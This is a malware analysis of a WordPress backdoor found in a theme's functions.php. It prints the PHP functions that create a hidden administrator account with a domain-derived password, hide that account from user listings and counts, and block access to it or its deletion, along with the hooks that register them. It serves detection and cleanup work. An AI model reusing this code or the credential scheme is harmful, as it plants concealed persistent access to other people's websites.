Hidden WordPress Admin Backdoor Malware – In-Depth Technical Review

Malicious PHP code discovered in WordPress theme’s functions.php file containing a sophisticated backdoor that creates a hidden administrative user account with advanced stealth capabilities.

Hidden Administrative Backdoor – A persistent access mechanism that automatically creates and protects a concealed administrator account, classified as a WordPress Backdoor Admin Creation Malware.

Code Breakdown and Decoding

Primary Malware Functions

The malware consists of five interconnected PHP functions designed to create and maintain unauthorized administrative access:

1. auto_create_fallback_admin() – Core Backdoor Function

function auto_create_fallback_admin() {
    $user = get_user_by('login', 'adm1nlxg1n');

    if (!$user) {
        $site_url = site_url();
        $parsed_url = parse_url($site_url);
        $domain = str_replace('.', '', $parsed_url['host']);
        $template = array(2, 'X', 3, '3', 0, 'Y', 1, '1qP', 4, 6, 'x', 'K', 5);
        $result = '';
        foreach ($template as $item) {
            $result .= is_int($item) ? ($domain[$item] ?? '') : $item;
        }

        $args = array(
            'user_login' => 'adm1nlxg1n',
            'user_pass' => $result,
            'role' => 'administrator',
            'user_email' => 'wordpresupportadm11@gmail.com'
        );

        $id = wp_insert_user($args);
        update_option('_pre_user_id', $id);
    }
}

Password Generation Algorithm Analysis:
The malware uses a sophisticated domain-based password generation system. It extracts the website’s domain, removes dots, and applies a character template to create a unique password per site:

• Template: [2, ‘X’, 3, ‘3’, 0, ‘Y’, 1, ‘1qP’, 4, 6, ‘x’, ‘K’, 5]
• Process: Integers reference domain character positions, strings are added literally
• Example: For example.com → examplecom → Password: aXm3eYx1qPpexKl

2. wc_tool_query_fallback() – User List Concealment

function wc_tool_query_fallback($user_search) {
    $user_id = get_current_user_id();
    $id = get_option('_pre_user_id');
    if (is_wp_error($id) || $user_id == $id) return;
    global $wpdb;
    $user_search->query_where = str_replace('WHERE 1=1',
        "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}",
        $user_search->query_where);
}

This function modifies database queries to exclude the malicious admin from user listings in the WordPress dashboard.

3. protect_user_count_fallback() – Count Manipulation

function protect_user_count_fallback($views) {
    // Reduces admin count display by 1 to hide the extra admin
    $html = explode('(', $views['all']);
    $count = explode(')', $html[1]);
    $count[0]--;
    $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1];
    // Similar manipulation for administrator count
    return $views;
}

4. wc_tool_profiles_fallback() – Profile Access Prevention

function wc_tool_profiles_fallback() {
    $user_id = get_current_user_id();
    $id = get_option('_pre_user_id');
    if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) {
        wp_die(__('Invalid user ID.'));
    }
}

5. protect_user_from_deleting_fallback() – Deletion Prevention

function protect_user_from_deleting_fallback() {
    $id = get_option('_pre_user_id');
    if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action'])
        && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) {
        wp_die(__('Invalid user ID.'));
    }
}

Stealth and Evasion Techniques

• Disguised Username: Uses adm1nlxg1n instead of obvious terms like “admin”
• Legitimate-Looking Email: wordpresupportadm11@gmail.com mimics WordPress support
• Database Hiding: Modifies WordPress queries to exclude the user from admin interfaces
• Count Manipulation: Reduces displayed user counts to mask the extra administrator
• Access Protection: Prevents profile viewing and user deletion attempts
• Domain-Specific Passwords: Generates unique passwords per website to avoid detection

WordPress Hook Integration

The malware registers its functions with WordPress hooks to execute automatically:

• add_action('init', 'auto_create_fallback_admin') – Creates user on every page load
• add_action('pre_user_query', 'wc_tool_query_fallback') – Hides from user queries
• add_filter('views_users', 'protect_user_count_fallback') – Manipulates user counts
• add_action('load-user-edit.php', 'wc_tool_profiles_fallback') – Blocks profile access
• add_action('admin_menu', 'protect_user_from_deleting_fallback') – Prevents deletion

Security Impact and Persistence

This malware demonstrates advanced persistence mechanisms commonly found in WordPress backdoor attacks:

• Automatic Execution: Runs on every WordPress initialization
• Self-Protection: Multiple layers prevent detection and removal
• Administrative Access: Full WordPress privileges for arbitrary code execution
• Reinfection Capability: Can reinstall itself if core functions remain

The malware belongs to a broader category of WordPress backdoor malware that has been increasingly sophisticated, with security researchers noting that such attacks often evade detection by multiple security scanners.